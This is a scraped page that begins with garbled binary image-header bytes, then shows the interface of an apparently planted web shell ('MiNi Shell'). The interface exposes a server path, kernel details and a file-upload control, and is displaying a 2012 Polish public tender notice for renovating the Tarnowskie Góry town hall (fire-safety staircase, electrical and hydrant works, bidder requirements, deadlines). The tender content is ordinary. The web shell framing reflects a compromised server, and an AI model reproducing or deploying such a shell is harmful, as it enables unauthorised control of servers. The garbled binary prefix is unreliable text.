JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120606/191028-N-2012.html

<p class="kh_header"><b>Tarnowskie Góry: Remont budynku Urzędu Miejskiego przy ul. Sienkiewicza 2 w Tarnowskich Górach</b><br>
<b>Numer ogłoszenia: 191028 - 2012; data zamieszczenia: 06.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Tarnowskie Góry , Rynek 4, 42-600 Tarnowskie Góry, woj. śląskie, tel. 032 3933600, 3933855, faks 032 3933602.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.tarnowskiegory.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont budynku Urzędu Miejskiego przy ul. Sienkiewicza 2 w Tarnowskich Górach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest robota budowlana polegająca na wykonaniu remontu budynku Urzędu Miejskiego przy ul. Sienkiewicza 2 w Tarnowskich Górach.
Zakres prac obejmuje:
Przebudowę głównej  klatki schodowej w budynku UM w Tarnowskich Górach (etap II) oraz montaż  obróbek blacharskich gzymsów i parapetów zewnętrznych na elewacji od strony podwórza oraz wymianę drzwi  na II piętrze przy Wydziale Edukacji i Wydziale Inwestycji i Remontów . 
Klatka schodowa przeznaczona do remontu prowadzi od głównego wejścia do budynku. Planowane jest wydzielenie klatki schodowej głównej (nr K1) drzwiami przeciwpożarowymi wraz z wzmocnieniem i zabezpieczeniem konstrukcji drewnianej schodów.  Ponadto zabezpieczenie preparatem przeciwpożarowym konstrukcji dachowej wraz z montażem klapy oddymiającej. Przeprowadzony zostanie remont wejścia głównego, bocznego (obok USC) i wejścia do piwnicy (archiwum). W obrębie klatki schodowej przeprowadzony zostanie remont instalacji elektrycznej (instalacji oświetlenia podstawowego i awaryjnego oraz gniazd wtykowych), instalacja alarmu pożarowego oraz instalacja elektryczna urządzeń oddymiających. Należy poprowadzić instalację hydrantową wewnętrzną w rejonie dwóch klatek schodowych K1 + K2. Na  części zachodniej elewacji od strony podwórza obok wejścia bocznego zamontowane zostaną  obróbki blacharskie miedziane na gzymsach i parapetach zewnętrznych, uzupełnione zostaną ubytki tynków wraz z malowaniem ścian związanych z obróbkami blacharskimi. Na drugim piętrze w rejonie klatki bocznej w Wydziałach Edukacji i Wydziale Inwestycji i Remontów zostaną wymienione drzwi.   Roboty związane z zadaniem nie mogą zakłócać  normalnej pracy Urzędu. Roboty uciążliwe (wyburzeniowe, transport materiału, o wysokim poziomie hałasu) należy wykonywać poza godzinami pracy tutejszego Urzędu. Należy przedłożyć Zamawiającemu harmonogram robót do akceptacji w celu umożliwienia komunikacji do poszczególnych pomieszczeń urzędu.. W czasie wykonywania prac na klatce schodowej pomiędzy I i II piętrem należy zachować możliwość komunikacji do Wydziału Ochrony Środowiska. 
I. Część elektryczna
Zakres prac  do wykonania w zakresie klatki schodowej 	1. Roboty demontażowe.
2. Instalacja oświetlenia podstawowego i awaryjnego oraz gniazd wtykowych ogólnego  przeznaczenia w piwnicy, parterze, I piętrze i II piętrze. 
3. Instalacja systemu sygnalizacji pożaru w piwnicy, parterze  i I piętrze wraz z montażem modułowej centrali alarmowej.
4. System oświetlenia awaryjnego na parterze, I piętrze i II piętrze.
5. Instalacja oddymiająca wraz z centralką sterowania oddymianiem.

Zakres ww prac objętych postępowaniem przetargowym jest ujęty w przedmiarze robót, projekcie wykonawczym aktualizacji w zakresie klatki schodowej.
Pozostały zakres robót ujętych w dokumentacji projektowej elektrycznej obejmującej całość instalacji budynku przy ulicy Sienkiewicza 2 i 2a i Specyfikacji Technicznej nie są objęte postępowaniem przetargowym.

Uwaga:
Zaproponowane materiały do realizacji projektu, ich typy i nazwy stanowią jedynie przykład i standard rozwiązania. Dopuszcza się ich zastąpienie przez inne o parametrach nie gorszych niż zaproponowane posiadające odpowiednie certyfikaty, deklaracje zgodności z PN lub aprobaty techniczne.

II. Część budowlana

Zakres prac budowlanych jakie należy wykonać obejmuje:
1. Wydzielenie klatki schodowej:
- roboty demontażowe
- wymiana istniejących drzwi stalowych w piwnicy na przeciwpożarowe
- montaż drzwi przeciwpożarowych wydzielających pożarowo dwuskrzydłowych  w ściance przeszklonej na parterze i I piętrze  
- w korytarzu zamontować drzwi przeciwpożarowe na parterze (jednoskrzydłowe) i na I piętrze  (dwuskrzydłowe) z naświetlem
- konstrukcje schodów wzmocnić rurami stalowymi
- osadzenie klapy dymowej w połaci dachowej i stropie nad klatką schodową
- zabezpieczenie ppoż. konstrukcji nośnej dachu wraz z dociepleniem i montażem płyt GKF na rusztach metalowych
- usunięcie starej farby i szlifowanie schodów i balustrad
- na istniejące stopnie  mocować nakładki gr. 2 cm z drewna dębowego
- schody i spoczniki obudować z boku i od spodu płytą GKF grub. 2 x 12,5 mm
- skrobanie i gruntowanie ścian i sufitów
- wykonanie gładzi gipsowej
- wszystkie elementy drewniane schodów zabezpieczyć preparatem ppoż.
- lakierowanie schodów i balustrad  
- istniejące schody z lastryka wyczyścić  
- skuć istniejące płytki kamienne oraz przed wejściem (spocznik) na poz. -1,16 i położyć nowe płytki granitowe   
2. Remont wejść do budynku
a wejście do piwnicy (archiwum)
- renowacja drzwi
- wymiana stopni granitowych na nowe
- naprawa murku ( czapa z granitu )
- założenie wycieraczki
b wejście boczne (na podwórze)
- demontaż drzwi
- rozebrać istniejący daszek betonowy
- montaż nowych drzwi zewnętrznych drewnianych
- obłożenie stopni płytkami granitowymi - wykonanie nowej posadzki z płytek granitowych
- montaż zadaszenia z poliwęglanu
- montaż kurtyny powietrznej
- założenie nowego rusztu wycieraczki
c wejście boczne (obok USC )
- demontaż drzwi
- montaż nowych drzwi zewnętrznych drewnianych
- zerwanie posadzek
- położenie nowej posadzki z płytek granitowych
- wyczyszczenie stopni i płyt granitowych 
- remont poręczy
d wejście główne 
- renowacja drzwi
- skucie posadzki
- wykonanie nowej posadzki z płytek granitowych
- wyczyszczenie stopni granitowych i z lastryko
- remont murku - wymiana płyt z piaskowca na granitowe
- wykonanie wycieraczki
3. Instalacja hydrantowa wewnętrzna.
- wykucie wnęk pod skrzynki hydrantowe i bruzd pod rurociąg
- ułożenie rurociągu stalowego ocynk na połączenia gwintowe
- montaż szafek hydrantowych z wyposażeniem
- uzupełnienie tynków
- wymiana grzejników na parterze budynku
- wymiana wodomierza i zaworów w węźle pomiarowym 
4.Montaż  obróbek blacharskich miedzianych na gzymsach i parapetach zewnętrznych na części elewacji od strony podwórza
- przygotowanie podłoża betonowego pod parapety
- wykonanie konstrukcji wsporczej z blachy ocynk
- montaż  obróbek blacharskich miedzianych na parapetach i gzymsach
- uzupełnienie ubytków tynków 
- roboty malarskie
5.Wymiana drzwi wewnętrznych na II piętrze Wydziału Edukacji i Wydziału Inwestycji i Remontów:
- demontaż istniejących drzwi
- osadzenie nadproży betonowych prefabrykowanych  
- montaż drzwi wewnętrznych
- uzupełnienie ubytków tynku
- malowanie tynków
Zakres robót części budowlanej objętych postępowaniem przetargowym jest ujęte w : 
1.Przedmiarze robót.
2.Dokumentacji projektowej Przebudowa pomieszczeń w budynku UM w Tarnowskich Górach ( II etap)  łącznie z aktualizacją na kwiecień 2012 r. z wyjątkiem Instalacje elektryczne wewnętrzne.    
3. Specyfikacji Technicznej z wyjątkiem działu IV. Szczegółowa Specyfikacja Techniczna -  branżą elektryczna. 
Nie obowiązuje zapis ujęty w Ogólnej Specyfikacji Technicznej w pkt. 8.2. Odbiór końcowy - ostateczny brzmiący: Odbiór nastąpi na pisemne powiadomienie Zamawiającego przez Wykonawcę, 2 tygodnie przed terminem zakończenia wskazanym w  umowie.,  lecz zgodnie z §7 ust.1 i 2 wzoru umowy (załącznik nr 2-wzór).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.31.11.00-1, 45.31.12.00-2, 45.31.43.20-0, 45.31.21.00-8, 45.26.26.90-4, 45.34.30.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości 12.000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się posiadaniem wiedzy i doświadczenia w zakresie wykonania przedmiotu zamówienia polegającym na wykonaniu w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej:
- jednej roboty budowlanej obejmującej swym zakresem wykonanie okablowania elektrycznego,  instalacji elektrycznych, instalacji informatycznej i telefonicznej, instalacji przeciwpożarowych systemów alarmowych,
lub 
 wykonaniem co najmniej po jednej robocie budowlanej obejmującej : 	
- wykonanie  okablowania  elektrycznego,  instalacji  elektrycznych,
- wykonanie  instalacji  informatycznej  i  telefonicznej
- wykonanie  instalacji  przeciwpożarowych  systemów  alarmowych.
UWAGA! 
W powyższym przypadku warunek udziału zostanie spełniony jeśli Wykonawca wykaże wykonanie  wszystkich wyżej wymienionych robót.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż będzie dysponował co najmniej:
- jedną osobą posiadającą aktualne uprawnienia budowlane do kierowania robotami na obiektach zabytkowych w specjalności konstrukcyjno - budowlanej,
W/w osoba musi posiadać udokumentowane kwalifikacje określone w § 24 ust. 2 lub § 31   Rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. (Dz. U. z 2011 r., Nr 165 poz. 987):
a) zgodne z § 24. Rozporządzenia do kierowania robotami budowlanymi przy zabytkach nieruchomych wpisanych do rejestru zabytków mają osoby, które posiadają odpowiednie uprawnienia budowlane określone w ustawie z dnia 7 lipca 1994 r. Prawo budowlane oraz - odbyły co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków
lub
b)  zgodne z § 31 Rozporządzenia posiadają osoby które - uzyskały zaświadczenie o posiadaniu kwalifikacji na podstawie § 19 rozporządzenia Ministra Kultury i Sztuki z dnia 24 sierpnia 1964 r. w sprawie zezwoleń na prowadzenie prac konserwatorskich przy zabytkach i archeologicznych prac wykopaliskowych (...) oraz § 17-19 rozporządzenia Ministra Kultury i Sztuki z dnia 11 stycznia 1994 r. o zasadach i trybie udzielania zezwoleń na prowadzenie prac konserwatorskich przy zabytkach oraz prac archeologicznych i wykopaliskowych, warunkach ich prowadzenia i kwalifikacjach osób, które mają prawo prowadzenia tej działalności.
oraz
- jedną osobą posiadającą aktualne uprawnienia budowlane do kierowania robotami w specjalności sieci, instalacji, urządzeń elektrycznych i elektroenergetycznych,  
oraz
- jedną osobą posiadającą aktualne uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga by Wykonawca posiadał środki finansowe lub zdolność kredytową w wysokości minimum 200.000,00 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz oferta oraz kosztorysy ofertowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w następujących zakresach: a) ceny ofertowej: w przypadku ustawowej zmiany stawki podatku VAT w czasie realizacji zamówienia, o wielkość tej stawki,
b) terminu wykonania zamówienia: amawiający przewiduje  możliwość zmiany terminu (data) wykonania zamówienia: w przypadku udzielenia Wykonawcy zamówienia dodatkowego w oparciu o art. 67 ust. 1 pkt. 5 ustawy Pzp, jeśli jego wykonanie (sposób, technologia) będzie skutkowało wydłużeniem terminu wykonania zamówienia podstawowego; w przypadku wstrzymania  robót budowlanych w wyniku działania siły wyższej, oraz w przypadku niekorzystnych warunków atmosferycznych uniemożliwiających prowadzenie robót np. opady deszczu, śniegu itp., potwierdzonego wpisem do dziennika budowy przez inspektora nadzoru lub upoważnionego przedstawiciela Zamawiającego, o ile czas wstrzymania robót i ich zakres będzie skutkować wydłużeniem terminu wykonania zamówienia;
W powyższych przypadkach nowy termin wykonania zamówienia ustali Zamawiający  po negocjacjach z Wykonawcą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.tarnowskiegory.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Tarnowskich Górach, ul. Rynek 4, 42-600 Tarnowskie Góry, Biuro Zamówień Publicznych, pok. 26.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.06.2012 godzina 10:00, miejsce: Urząd Miejski w Tarnowskich Górach, ul. Rynek 4, 42-600 Tarnowskie Góry, Biuro Zamówień Publicznych, pok. 26.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com